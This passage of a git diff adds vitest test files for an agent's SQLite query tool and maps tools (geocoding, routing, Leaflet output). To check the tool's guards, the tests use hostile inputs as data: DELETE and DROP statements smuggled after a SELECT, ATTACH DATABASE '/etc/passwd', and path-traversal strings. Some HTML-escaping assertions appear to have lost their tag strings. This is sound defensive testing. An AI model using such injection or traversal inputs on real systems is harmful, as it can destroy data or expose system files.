rVal[1]; diff --git a/src/engine/tools/data.test.ts b/src/engine/tools/data.test.ts new file mode 100644 index 0000000..d891b80 --- /dev/null +++ b/src/engine/tools/data.test.ts @@ -0,0 +1,479 @@ +import * as fs from 'fs'; +import * as path from 'path'; +import { tmpdir } from 'os'; +import Database from 'better-sqlite3'; +import { afterEach, describe, expect, it } from 'vitest'; +import { executeTool, TOOL_DEFS } from './data.js'; +import type { ToolContext } from './core.js'; + +function makeWorkspace(): string { + return fs.mkdtempSync(path.join(tmpdir(), 'maestro-data-')); +} + +function makeContext(workspacePath: string, editAllowed = false): ToolContext { + return { workspacePath, editAllowed }; +} + +/** Create a fixture DB with a users table inside the workspace. */ +function createFixtureDb(workspacePath: string, fileName = 'fixture.db'): string { + const dbPath = path.join(workspacePath, fileName); + const db = new Database(dbPath); + db.exec(` + CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, age INTEGER); + INSERT INTO users (name, age) VALUES ('alice', 30), ('bob', 25), ('carol', 35); + `); + db.close(); + return fileName; +} + +describe('SQLite tool', () => { + let workspacePath = ''; + + afterEach(() => { + if (workspacePath) { + fs.rmSync(workspacePath, { recursive: true, force: true }); + workspacePath = ''; + } + }); + + it('exposes only the SQLite tool def', () => { + expect(Object.keys(TOOL_DEFS)).toEqual(['SQLite']); + expect(TOOL_DEFS['SQLite']!.function.name).toBe('SQLite'); + }); + + it('returns null for unknown tool names', async () => { + workspacePath = makeWorkspace(); + const result = await executeTool('NotATool', { query: 'SELECT 1' }, makeContext(workspacePath)); + expect(result).toBeNull(); + }); + + describe('SELECT happy path', () => { + it('returns a formatted table for a SELECT in read-only mode', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT name, age FROM users ORDER BY age', db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('name'); + expect(result?.output).toContain('age'); + expect(result?.output).toContain('bob'); + expect(result?.output).toContain('alice'); + expect(result?.output).toContain('carol'); + expect(result?.output).toContain('(3 rows)'); + }); + + it('formats an empty result set as (0 rows)', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: "SELECT * FROM users WHERE name = 'nobody'", db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toBe('(0 rows)'); + }); + + it('uses singular "row" for a single-row result', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: "SELECT name FROM users WHERE name = 'alice'", db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('(1 row)'); + }); + + it('renders NULL values as NULL', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + const db = new Database(path.join(workspacePath, dbFile)); + db.exec("INSERT INTO users (name, age) VALUES ('dave', NULL)"); + db.close(); + + const result = await executeTool( + 'SQLite', + { query: "SELECT age FROM users WHERE name = 'dave'", db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('NULL'); + }); + + it('executes multiple SELECT statements and joins their outputs', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { + query: "SELECT name FROM users WHERE name = 'alice'; SELECT name FROM users WHERE name = 'bob';", + db_path: dbFile, + }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('alice'); + expect(result?.output).toContain('bob'); + }); + }); + + describe('write guards (editAllowed=false)', () => { + it.each(['INSERT', 'UPDATE', 'DELETE', 'REPLACE'])('rejects %s in read-only mode', async (kw) => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + const queries: Record = { + INSERT: "INSERT INTO users (name, age) VALUES ('mallory', 1)", + UPDATE: "UPDATE users SET age = 99 WHERE name = 'alice'", + DELETE: 'DELETE FROM users', + REPLACE: "REPLACE INTO users (id, name, age) VALUES (1, 'evil', 0)", + }; + + const result = await executeTool('SQLite', { query: queries[kw]!, db_path: dbFile }, makeContext(workspacePath, false)); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Only SELECT queries are allowed'); + }); + + it('rejects a write smuggled after a SELECT in a multi-statement query', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT * FROM users; DELETE FROM users', db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(true); + // Guard fires before anything executes; data must be intact + const db = new Database(path.join(workspacePath, dbFile), { readonly: true }); + const count = db.prepare('SELECT COUNT(*) AS c FROM users').get() as { c: number }; + db.close(); + expect(count.c).toBe(3); + }); + + it('rejects CREATE TABLE in read-only mode', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'CREATE TABLE extra (id INTEGER)', db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Only SELECT queries are allowed'); + }); + }); + + describe('writes allowed (editAllowed=true)', () => { + it('supports CREATE TABLE + INSERT + SELECT in one call', async () => { + workspacePath = makeWorkspace(); + + const result = await executeTool( + 'SQLite', + { + query: "CREATE TABLE t (v TEXT); INSERT INTO t (v) VALUES ('x'), ('y'); SELECT COUNT(*) AS c FROM t", + db_path: 'new.db', + }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('OK'); + expect(result?.output).toContain('2 row(s) affected'); + expect(result?.output).toContain('2'); + expect(fs.existsSync(path.join(workspacePath, 'new.db'))).toBe(true); + }); + + it('defaults db_path to temp.db inside the workspace', async () => { + workspacePath = makeWorkspace(); + + const result = await executeTool( + 'SQLite', + { query: 'CREATE TABLE t (v TEXT)' }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(false); + expect(fs.existsSync(path.join(workspacePath, 'temp.db'))).toBe(true); + }); + + it('reports affected row count for UPDATE', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'UPDATE users SET age = age + 1', db_path: dbFile }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('3 row(s) affected'); + }); + }); + + describe('always-blocked DDL', () => { + it.each([ + ['DROP TABLE users', 'DROP'], + ['ALTER TABLE users ADD COLUMN extra TEXT', 'ALTER'], + ["ATTACH DATABASE '/etc/passwd' AS evil", 'ATTACH'], + ['DETACH DATABASE evil', 'DETACH'], + ['REINDEX', 'REINDEX'], + ['VACUUM', 'VACUUM'], + ])('blocks "%s" even with editAllowed=true', async (query, kw) => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool('SQLite', { query, db_path: dbFile }, makeContext(workspacePath, true)); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Forbidden SQL'); + expect(result?.output).toContain(kw); + }); + + it.each([ + 'CREATE INDEX idx ON users (name)', + 'CREATE UNIQUE INDEX idx ON users (name)', + 'CREATE TRIGGER trg AFTER INSERT ON users BEGIN SELECT 1; END', + ])('blocks "%s"', async (query) => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool('SQLite', { query, db_path: dbFile }, makeContext(workspacePath, true)); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Forbidden SQL'); + }); + + it('is case-insensitive for blocked keywords', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'drop table users', db_path: dbFile }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Forbidden SQL'); + }); + + it('blocks DDL hidden behind a SELECT in a multi-statement query', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT 1; DROP TABLE users', db_path: dbFile }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Forbidden SQL'); + }); + }); + + describe('PRAGMA handling', () => { + it('allows PRAGMA table_info when edit is enabled', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'PRAGMA table_info(users)', db_path: dbFile }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('name'); + expect(result?.output).toContain('age'); + }); + + it('blocks PRAGMA other than table_info/table_list', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'PRAGMA journal_mode = WAL', db_path: dbFile }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('PRAGMA'); + expect(result?.output).toContain('not allowed'); + }); + + // Documents current behavior: PRAGMA table_info survives the DDL block list + // but the read-only gate only whitelists SELECT, so it is rejected when + // editAllowed=false. Schema inspection therefore requires edit mode. + it('rejects PRAGMA table_info in read-only mode (current behavior)', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'PRAGMA table_info(users)', db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Only SELECT queries are allowed'); + }); + }); + + describe('errors', () => { + it('rejects an empty query', async () => { + workspacePath = makeWorkspace(); + + const result = await executeTool('SQLite', { query: ' ;; ' }, makeContext(workspacePath, true)); + + expect(result?.isError).toBe(true); + expect(result?.output).toBe('Empty query'); + }); + + it('returns a Query error for SQL referencing a missing table', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT * FROM no_such_table', db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Query error'); + expect(result?.output).toContain('no_such_table'); + }); + + it('returns a syntax error as Query error', async () => { + workspacePath = makeWorkspace(); + const dbFile = createFixtureDb(workspacePath); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT FROM WHERE', db_path: dbFile }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Query error'); + }); + + it('fails to open a missing DB file in read-only mode', async () => { + workspacePath = makeWorkspace(); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT 1', db_path: 'does-not-exist.db' }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Failed to open database'); + }); + + it('returns a Query error when the file is not a SQLite database', async () => { + workspacePath = makeWorkspace(); + fs.writeFileSync(path.join(workspacePath, 'not-a-db.db'), 'this is plain text, not sqlite'); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT 1', db_path: 'not-a-db.db' }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(true); + }); + }); + + describe('path traversal guard', () => { + it.each([ + '../outside.db', + '../../etc/evil.db', + 'sub/../../escape.db', + ])('rejects db_path "%s" outside the workspace', async (dbPath) => { + workspacePath = makeWorkspace(); + + const result = await executeTool('SQLite', { query: 'SELECT 1', db_path: dbPath }, makeContext(workspacePath, true)); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Path traversal'); + }); + + it('rejects an absolute db_path outside the workspace', async () => { + workspacePath = makeWorkspace(); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT 1', db_path: '/tmp/evil-absolute.db' }, + makeContext(workspacePath, true), + ); + + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Path traversal'); + }); + + it('allows a relative path inside a workspace subdirectory', async () => { + workspacePath = makeWorkspace(); + fs.mkdirSync(path.join(workspacePath, 'output'), { recursive: true }); + createFixtureDb(workspacePath, path.join('output', 'nested.db')); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT COUNT(*) AS c FROM users', db_path: 'output/nested.db' }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('3'); + }); + }); + + describe('large result sets', () => { + // Documents current behavior: the tool has no output truncation, so a + // large SELECT returns every row verbatim. + it('returns all rows of a large SELECT (no truncation in the tool itself)', async () => { + workspacePath = makeWorkspace(); + const dbPath = path.join(workspacePath, 'big.db'); + const db = new Database(dbPath); + db.exec('CREATE TABLE big (id INTEGER PRIMARY KEY, payload TEXT)'); + const insert = db.prepare('INSERT INTO big (payload) VALUES (?)'); + const tx = db.transaction(() => { + for (let i = 0; i < 2000; i++) insert.run(`row-payload-${i}-${'x'.repeat(50)}`); + }); + tx(); + db.close(); + + const result = await executeTool( + 'SQLite', + { query: 'SELECT * FROM big', db_path: 'big.db' }, + makeContext(workspacePath, false), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('(2000 rows)'); + expect(result?.output).toContain('row-payload-0-'); + expect(result?.output).toContain('row-payload-1999-'); + }); + }); +}); diff --git a/src/engine/tools/maps.test.ts b/src/engine/tools/maps.test.ts new file mode 100644 index 0000000..b5d4001 --- /dev/null +++ b/src/engine/tools/maps.test.ts @@ -0,0 +1,566 @@ +import * as fs from 'fs'; +import * as path from 'path'; +import { tmpdir } from 'os'; +import { afterEach, describe, expect, it, vi } from 'vitest'; +import { executeTool } from './maps.js'; +import type { ToolContext } from './core.js'; + +function makeWorkspace(): string { + return fs.mkdtempSync(path.join(tmpdir(), 'maestro-maps-')); +} + +function makeContext(workspacePath: string, opts: { apiKey?: string } = {}): ToolContext { + return { + workspacePath, + editAllowed: false, + toolsConfig: { + ...(opts.apiKey ? { googleMapsApiKey: opts.apiKey } : {}), + mapsTimeout: 5, + }, + }; +} + +function jsonResponse(body: unknown, status = 200): Response { + return new Response(JSON.stringify(body), { + status, + headers: { 'content-type': 'application/json' }, + }); +} + +const NOMINATIM_PLACE = { + place_id: 1, + lat: '35.658584', + lon: '139.745433', + display_name: '東京タワー, 4, 芝公園, 港区, 東京都, 105-0011, 日本', + address: { country: '日本' }, + type: 'attraction', + class: 'tourism', + importance: 0.7, +}; + +const OSRM_ROUTE = { + code: 'Ok', + routes: [ + { + distance: 3456.7, + duration: 754, + legs: [ + { + steps: [ + { maneuver: { type: 'depart' }, distance: 100.4, duration: 30, name: '桜田通り' }, + { maneuver: { type: 'turn', modifier: 'left' }, distance: 200, duration: 60, name: '' }, + ], + }, + ], + }, + ], +}; + +describe('maps tools', () => { + let workspacePath = ''; + + afterEach(() => { + if (workspacePath) { + fs.rmSync(workspacePath, { recursive: true, force: true }); + workspacePath = ''; + } + vi.unstubAllGlobals(); + vi.restoreAllMocks(); + }); + + it('returns null for unknown tool name', async () => { + workspacePath = makeWorkspace(); + const result = await executeTool('NotAMapsTool', {}, makeContext(workspacePath)); + expect(result).toBeNull(); + }); + + // --------------------------------------------------------------------- + // SearchPlaces + // --------------------------------------------------------------------- + + describe('SearchPlaces', () => { + it('rejects missing query', async () => { + workspacePath = makeWorkspace(); + const result = await executeTool('SearchPlaces', {}, makeContext(workspacePath)); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('query は必須です'); + }); + + it('rejects whitespace-only query', async () => { + workspacePath = makeWorkspace(); + const result = await executeTool('SearchPlaces', { query: ' ' }, makeContext(workspacePath)); + expect(result?.isError).toBe(true); + }); + + it('searches via Nominatim when no API key is configured', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockResolvedValue(jsonResponse([NOMINATIM_PLACE])); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool('SearchPlaces', { query: '東京タワー' }, makeContext(workspacePath)); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('## 地図検索結果: 東京タワー'); + expect(result?.output).toContain('1件の場所が見つかりました'); + expect(result?.output).toContain('### 1. 東京タワー'); + expect(result?.output).toContain('**座標**: 35.658584, 139.745433'); + expect(result?.output).toContain('**種別**: attraction'); + expect(result?.output).toContain('https://www.openstreetmap.org/?mlat=35.658584&mlon=139.745433&zoom=17'); + // embed marker + structured block + expect(result?.output).toMatch(/\[\[embed:map-\d+\]\]/); + expect(result?.structuredBlocks).toHaveLength(1); + const block = result?.structuredBlocks?.[0]; + expect(block?.type).toBe('map_places'); + expect(block?.data).toMatchObject({ + query: '東京タワー', + places: [ + expect.objectContaining({ + name: '東京タワー', + lat: 35.658584, + lon: 139.745433, + type: 'attraction', + }), + ], + }); + + expect(fetchMock).toHaveBeenCalledTimes(1); + const url = String(fetchMock.mock.calls[0]?.[0]); + expect(url).toContain('nominatim.openstreetmap.org/search'); + expect(url).toContain('limit=5'); // default limit + expect(url).toContain('accept-language=ja'); // default lang + }); + + it('clamps limit to 1..20 and passes lang through', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockResolvedValue(jsonResponse([NOMINATIM_PLACE])); + vi.stubGlobal('fetch', fetchMock); + + await executeTool('SearchPlaces', { query: 'tower', limit: 50, lang: 'en' }, makeContext(workspacePath)); + expect(String(fetchMock.mock.calls[0]?.[0])).toContain('limit=20'); + expect(String(fetchMock.mock.calls[0]?.[0])).toContain('accept-language=en'); + + await executeTool('SearchPlaces', { query: 'tower', limit: 0 }, makeContext(workspacePath)); + expect(String(fetchMock.mock.calls[1]?.[0])).toContain('limit=1'); + }); + + it('returns error on Nominatim HTTP failure', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse({}, 500))); + + const result = await executeTool('SearchPlaces', { query: 'tower' }, makeContext(workspacePath)); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Nominatim API エラー: HTTP 500'); + }); + + it('returns non-error message when no places match', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse([]))); + + const result = await executeTool('SearchPlaces', { query: 'nowhere-xyz' }, makeContext(workspacePath)); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('「nowhere-xyz」に一致する場所が見つかりませんでした'); + }); + + it('returns error when fetch throws', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockRejectedValue(new Error('network down'))); + + const result = await executeTool('SearchPlaces', { query: 'tower' }, makeContext(workspacePath)); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('地図検索エラー: network down'); + }); + + it('uses Google Places API when API key is configured', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockResolvedValue(jsonResponse({ + status: 'OK', + results: [ + { + name: 'Tokyo Tower', + formatted_address: '4 Chome-2-8 Shibakoen, Minato City', + geometry: { location: { lat: 35.6586, lng: 139.7454 } }, + types: ['tourist_attraction'], + rating: 4.5, + opening_hours: { open_now: true }, + }, + ], + })); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'SearchPlaces', + { query: 'Tokyo Tower' }, + makeContext(workspacePath, { apiKey: 'test-google-key' }), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('### 1. Tokyo Tower'); + expect(result?.output).toContain('**詳細**: 評価: 4.5, 営業中'); + expect(result?.output).toContain('**種別**: tourist_attraction'); + // only the Google endpoint was hit; no Nominatim fallback + expect(fetchMock).toHaveBeenCalledTimes(1); + const url = String(fetchMock.mock.calls[0]?.[0]); + expect(url).toContain('maps.googleapis.com/maps/api/place/textsearch/json'); + expect(url).toContain('key=test-google-key'); + }); + + it('falls back to Nominatim when Google returns no results', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn() + .mockResolvedValueOnce(jsonResponse({ status: 'ZERO_RESULTS', results: [] })) + .mockResolvedValueOnce(jsonResponse([NOMINATIM_PLACE])); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'SearchPlaces', + { query: '東京タワー' }, + makeContext(workspacePath, { apiKey: 'test-google-key' }), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('### 1. 東京タワー'); + expect(fetchMock).toHaveBeenCalledTimes(2); + expect(String(fetchMock.mock.calls[1]?.[0])).toContain('nominatim.openstreetmap.org'); + }); + }); + + // --------------------------------------------------------------------- + // GetDirections + // --------------------------------------------------------------------- + + describe('GetDirections', () => { + it('rejects missing origin / destination', async () => { + workspacePath = makeWorkspace(); + const ctx = makeContext(workspacePath); + const noOrigin = await executeTool('GetDirections', { destination: 'B' }, ctx); + expect(noOrigin?.isError).toBe(true); + expect(noOrigin?.output).toContain('origin は必須です'); + + const noDest = await executeTool('GetDirections', { origin: 'A' }, ctx); + expect(noDest?.isError).toBe(true); + expect(noDest?.output).toContain('destination は必須です'); + }); + + it('routes via OSRM with "lat,lon" inputs (no geocoding round-trip)', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockResolvedValue(jsonResponse(OSRM_ROUTE)); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'GetDirections', + { origin: '35.6586,139.7454', destination: '35.681236, 139.767125' }, + makeContext(workspacePath), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('## 経路情報'); + expect(result?.output).toContain('**移動手段**: 車'); + expect(result?.output).toContain('**距離**: 3.5 km'); + expect(result?.output).toContain('**所要時間**: 13 分'); + expect(result?.output).toContain('### 経路ステップ'); + expect(result?.output).toContain('1. depart (桜田通り) — 100m'); + expect(result?.output).toContain('2. turn left — 200m'); + + // single OSRM call, lat/lon parsed directly (lon,lat order in URL) + expect(fetchMock).toHaveBeenCalledTimes(1); + const url = String(fetchMock.mock.calls[0]?.[0]); + expect(url).toContain('router.project-osrm.org/route/v1/car/'); + expect(url).toContain('139.7454,35.6586;139.767125,35.681236'); + }); + + it('maps walking/cycling modes to OSRM profiles', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockImplementation(async () => jsonResponse(OSRM_ROUTE)); + vi.stubGlobal('fetch', fetchMock); + const ctx = makeContext(workspacePath); + + const walking = await executeTool( + 'GetDirections', + { origin: '1,2', destination: '3,4', mode: 'walking' }, + ctx, + ); + expect(walking?.output).toContain('**移動手段**: 徒歩'); + expect(String(fetchMock.mock.calls[0]?.[0])).toContain('/route/v1/foot/'); + + const cycling = await executeTool( + 'GetDirections', + { origin: '1,2', destination: '3,4', mode: 'cycling' }, + ctx, + ); + expect(cycling?.output).toContain('**移動手段**: 自転車'); + expect(String(fetchMock.mock.calls[1]?.[0])).toContain('/route/v1/bike/'); + }); + + it('geocodes address inputs through Nominatim before calling OSRM', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockImplementation(async (rawUrl: string | URL) => { + const url = String(rawUrl); + if (url.includes('nominatim.openstreetmap.org/search')) { + if (url.includes(encodeURIComponent('東京駅'))) { + return jsonResponse([{ ...NOMINATIM_PLACE, lat: '35.681236', lon: '139.767125' }]); + } + return jsonResponse([NOMINATIM_PLACE]); + } + return jsonResponse(OSRM_ROUTE); + }); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'GetDirections', + { origin: '東京タワー', destination: '東京駅' }, + makeContext(workspacePath), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('**出発地**: 東京タワー'); + expect(result?.output).toContain('**目的地**: 東京駅'); + // 2 geocode calls + 1 OSRM call + expect(fetchMock).toHaveBeenCalledTimes(3); + const osrmCall = fetchMock.mock.calls.map((c) => String(c[0])).find((u) => u.includes('router.project-osrm.org')); + expect(osrmCall).toContain('139.745433,35.658584;139.767125,35.681236'); + }); + + it('returns error when origin cannot be geocoded', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse([]))); + + const result = await executeTool( + 'GetDirections', + { origin: '存在しない場所xyz', destination: '1,2' }, + makeContext(workspacePath), + ); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('出発地「存在しない場所xyz」の座標を取得できませんでした'); + }); + + it('returns error on OSRM HTTP failure', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse({}, 502))); + + const result = await executeTool( + 'GetDirections', + { origin: '1,2', destination: '3,4' }, + makeContext(workspacePath), + ); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('OSRM 経路取得エラー: HTTP 502'); + }); + + it('returns non-error message when OSRM finds no route', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse({ code: 'NoRoute', routes: [] }))); + + const result = await executeTool( + 'GetDirections', + { origin: '1,2', destination: '3,4' }, + makeContext(workspacePath), + ); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('経路が見つかりませんでした'); + }); + + it('writes a Leaflet HTML file when output_html=true', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse(OSRM_ROUTE))); + + const result = await executeTool( + 'GetDirections', + { origin: '1,2', destination: '3,4', output_html: true, filename: 'my_route' }, + makeContext(workspacePath), + ); + + expect(result?.isError).toBe(false); + // .html is appended when missing + expect(result?.output).toContain('output/maps/my_route.html'); + const filePath = path.join(workspacePath, 'output', 'maps', 'my_route.html'); + expect(fs.existsSync(filePath)).toBe(true); + const html = fs.readFileSync(filePath, 'utf-8'); + expect(html).toContain('leaflet'); + expect(html).toContain('3.5 km'); + expect(html).toContain('13 分'); + }); + + it('escapes HTML in generated route file names', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockImplementation(async (rawUrl: string | URL) => { + const url = String(rawUrl); + if (url.includes('nominatim')) return jsonResponse([NOMINATIM_PLACE]); + return jsonResponse(OSRM_ROUTE); + }); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'GetDirections', + { origin: '', destination: '1,2', output_html: true, filename: 'esc.html' }, + makeContext(workspacePath), + ); + + expect(result?.isError).toBe(false); + const html = fs.readFileSync(path.join(workspacePath, 'output', 'maps', 'esc.html'), 'utf-8'); + expect(html).not.toContain(''); + expect(html).toContain('<script>x</script>'); + }); + + it('uses Google Directions API when API key is configured', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockResolvedValue(jsonResponse({ + status: 'OK', + routes: [ + { + legs: [ + { + distance: { text: '3.4 km' }, + duration: { text: '12分' }, + steps: [ + { html_instructions: 'に進む', distance: { text: '0.2 km' } }, + ], + start_address: '日本、東京都港区芝公園', + end_address: '日本、東京都千代田区丸の内', + start_location: { lat: 35.6586, lng: 139.7454 }, + end_location: { lat: 35.6812, lng: 139.7671 }, + }, + ], + }, + ], + })); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'GetDirections', + { origin: '東京タワー', destination: '東京駅' }, + makeContext(workspacePath, { apiKey: 'test-google-key' }), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('**距離**: 3.4 km'); + expect(result?.output).toContain('**所要時間**: 12分'); + expect(result?.output).toContain('**出発地**: 日本、東京都港区芝公園'); + // HTML tags stripped from step instructions + expect(result?.output).toContain('南に進む (0.2 km)'); + expect(result?.output).not.toContain(''); + expect(fetchMock).toHaveBeenCalledTimes(1); + expect(String(fetchMock.mock.calls[0]?.[0])).toContain('maps.googleapis.com/maps/api/directions/json'); + }); + }); + + // --------------------------------------------------------------------- + // ReverseGeocode + // --------------------------------------------------------------------- + + describe('ReverseGeocode', () => { + it('rejects non-numeric coordinates', async () => { + workspacePath = makeWorkspace(); + const result = await executeTool('ReverseGeocode', { lat: 'abc', lon: 139 }, makeContext(workspacePath)); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('lat と lon は数値で指定してください'); + }); + + it('rejects out-of-range coordinates', async () => { + workspacePath = makeWorkspace(); + const ctx = makeContext(workspacePath); + const badLat = await executeTool('ReverseGeocode', { lat: 91, lon: 0 }, ctx); + expect(badLat?.isError).toBe(true); + expect(badLat?.output).toContain('座標の範囲が無効です'); + + const badLon = await executeTool('ReverseGeocode', { lat: 0, lon: -181 }, ctx); + expect(badLon?.isError).toBe(true); + }); + + it('returns formatted address components on success', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockResolvedValue(jsonResponse({ + place_id: 1, + lat: '35.658584', + lon: '139.745433', + display_name: '東京タワー, 4, 芝公園, 港区, 東京都, 105-0011, 日本', + address: { + amenity: '東京タワー', + house_number: '4', + road: '都道301号', + suburb: '芝公園', + city: '港区', + state: '東京都', + postcode: '105-0011', + country: '日本', + country_code: 'jp', + }, + boundingbox: ['35.657', '35.660', '139.744', '139.747'], + })); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'ReverseGeocode', + { lat: 35.658584, lon: 139.745433 }, + makeContext(workspacePath), + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('## 逆ジオコーディング結果'); + expect(result?.output).toContain('**座標**: 35.658584, 139.745433'); + expect(result?.output).toContain('**住所(全体)**: 東京タワー, 4, 芝公園, 港区, 東京都, 105-0011, 日本'); + expect(result?.output).toContain('- **郵便番号**: 105-0011'); + expect(result?.output).toContain('- **国**: 日本'); + expect(result?.output).toContain('- **都道府県**: 東京都'); + expect(result?.output).toContain('- **市区町村**: 港区'); + expect(result?.output).toContain('- **地区**: 芝公園'); + expect(result?.output).toContain('- **道路/通り**: 都道301号'); + expect(result?.output).toContain('- **番地**: 4'); + expect(result?.output).toContain('- **施設**: 東京タワー'); + expect(result?.output).toContain('https://www.openstreetmap.org/?mlat=35.658584&mlon=139.745433&zoom=17'); + + const url = String(fetchMock.mock.calls[0]?.[0]); + expect(url).toContain('nominatim.openstreetmap.org/reverse'); + expect(url).toContain('lat=35.658584'); + expect(url).toContain('lon=139.745433'); + 